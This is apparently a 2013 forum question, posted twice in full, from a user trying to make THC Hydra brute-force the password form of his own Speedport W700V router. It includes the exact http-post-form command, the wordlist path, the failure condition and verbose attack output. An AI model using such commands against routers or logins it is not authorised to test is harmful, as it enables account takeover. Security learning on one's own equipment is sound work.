DaRealMcCloud
2013-07-14, 14:57
Hi there,
I am a bit confused and was wondering if someone could shed some light on the problem I encounter.
I was trying to use THC Hydra to find the (known) login for my Speedport W700V.
I followed a tutorial in the old Backtrack Forum and thought I knew what was going on after finding the missing bits from other sources online.
To make it quick here is the command I tried to execute:
hydra -l "" -P /pentest/passwords/wordlists/easy.lst -t 1 -f -v -V 192.168.2.1 http-post-form "/cgi-bin/login.cgi:pws=^PASS^:F=loginpserr.stm"
and this is what I think is happening:
(please correct me if I am wrong)
-l "" blank username (the login requires only a password).
-P /pentest/passwords/wordlists/easy.lst a very limited password list with the correct password in line 3.
-t 1 just one instance
-f stop if password was found.
-v -V be verbose and be even more verbose.
192.168.2.1 http-post-form the IP of the router and using http POST on a form.
"/cgi-bin/login.cgi:pws=^PASS^:F=loginpserr.stm" the tricky bit ;) /cgi-bin/login.cgi is the login script. pws=^PASS^ is the only variable of the script (replace psw with the passwords from the list). F=loginpserr.stm this is the part I have wrong I believe. I am telling hydra here that if it gets an answer which contains "loginpserr.stm" the login wasn't successful. I used this expression after receiving this output from a previous attempt:
[ATTEMPT] target 192.168.2.1 - login "" - pass "1234" - 1 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/loginpserr.st
...
[ATTEMPT] target 192.168.2.1 - login "" - pass "1111" - 2 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/loginpserr.st
...
[ATTEMPT] target 192.168.2.1 - login "" - pass "0000" - 3 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
...
[ATTEMPT] target 192.168.2.1 - login "" - pass "1235" - 4 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/loginpserr.st
...
[STATUS] attack finished for 192.168.2.1 (waiting for children to finish)
1 of 1 target successfuly completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-07-14 15:26:13
I thought the router redirects me to loginpserr.st if incorrect and to wait.st if correct.
My output from the command at the top is as followed:
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2013-07-14 15:57:13
[DATA] 1 task, 1 server, 4 login tries (l:1/p:4), ~4 tries per task
[DATA] attacking service http-post-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.2.1 - login "" - pass "1234" - 1 of 4 [child 0]
[ATTEMPT] target 192.168.2.1 - login "" - pass "1111" - 2 of 4 [child 0]
[ATTEMPT] target 192.168.2.1 - login "" - pass "0000" - 3 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[ATTEMPT] target 192.168.2.1 - login "" - pass "1235" - 4 of 4 [child 0]
[STATUS] attack finished for 192.168.2.1 (waiting for children to finish)
1 of 1 target successfuly completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-07-14 15:57:20
am I on the right track ?
Why is there a "" around the last expression?
Whats the correct failed condition?
Should I post some screens of the page source?
I am a bit confused and was wondering if someone could shed some light on the problem I encounter.
I was trying to use THC Hydra to find the (known) login for my Speedport W700V.
I followed a tutorial in the old Backtrack Forum and thought I knew what was going on after finding the missing bits from other sources online.
To make it quick here is the command I tried to execute:
hydra -l "" -P /pentest/passwords/wordlists/easy.lst -t 1 -f -v -V 192.168.2.1 http-post-form "/cgi-bin/login.cgi:pws=^PASS^:F=loginpserr.stm"
and this is what I think is happening:
(please correct me if I am wrong)
-l "" blank username (the login requires only a password).
-P /pentest/passwords/wordlists/easy.lst a very limited password list with the correct password in line 3.
-t 1 just one instance
-f stop if password was found.
-v -V be verbose and be even more verbose.
192.168.2.1 http-post-form the IP of the router and using http POST on a form.
"/cgi-bin/login.cgi:pws=^PASS^:F=loginpserr.stm" the tricky bit ;) /cgi-bin/login.cgi is the login script. pws=^PASS^ is the only variable of the script (replace psw with the passwords from the list). F=loginpserr.stm this is the part I have wrong I believe. I am telling hydra here that if it gets an answer which contains "loginpserr.stm" the login wasn't successful. I used this expression after receiving this output from a previous attempt:
[ATTEMPT] target 192.168.2.1 - login "" - pass "1234" - 1 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/loginpserr.st
...
[ATTEMPT] target 192.168.2.1 - login "" - pass "1111" - 2 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/loginpserr.st
...
[ATTEMPT] target 192.168.2.1 - login "" - pass "0000" - 3 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
...
[ATTEMPT] target 192.168.2.1 - login "" - pass "1235" - 4 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/loginpserr.st
...
[STATUS] attack finished for 192.168.2.1 (waiting for children to finish)
1 of 1 target successfuly completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-07-14 15:26:13
I thought the router redirects me to loginpserr.st if incorrect and to wait.st if correct.
My output from the command at the top is as followed:
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2013-07-14 15:57:13
[DATA] 1 task, 1 server, 4 login tries (l:1/p:4), ~4 tries per task
[DATA] attacking service http-post-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.2.1 - login "" - pass "1234" - 1 of 4 [child 0]
[ATTEMPT] target 192.168.2.1 - login "" - pass "1111" - 2 of 4 [child 0]
[ATTEMPT] target 192.168.2.1 - login "" - pass "0000" - 3 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[ATTEMPT] target 192.168.2.1 - login "" - pass "1235" - 4 of 4 [child 0]
[STATUS] attack finished for 192.168.2.1 (waiting for children to finish)
1 of 1 target successfuly completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-07-14 15:57:20
am I on the right track ?
Why is there a "" around the last expression?
Whats the correct failed condition?
Should I post some screens of the page source?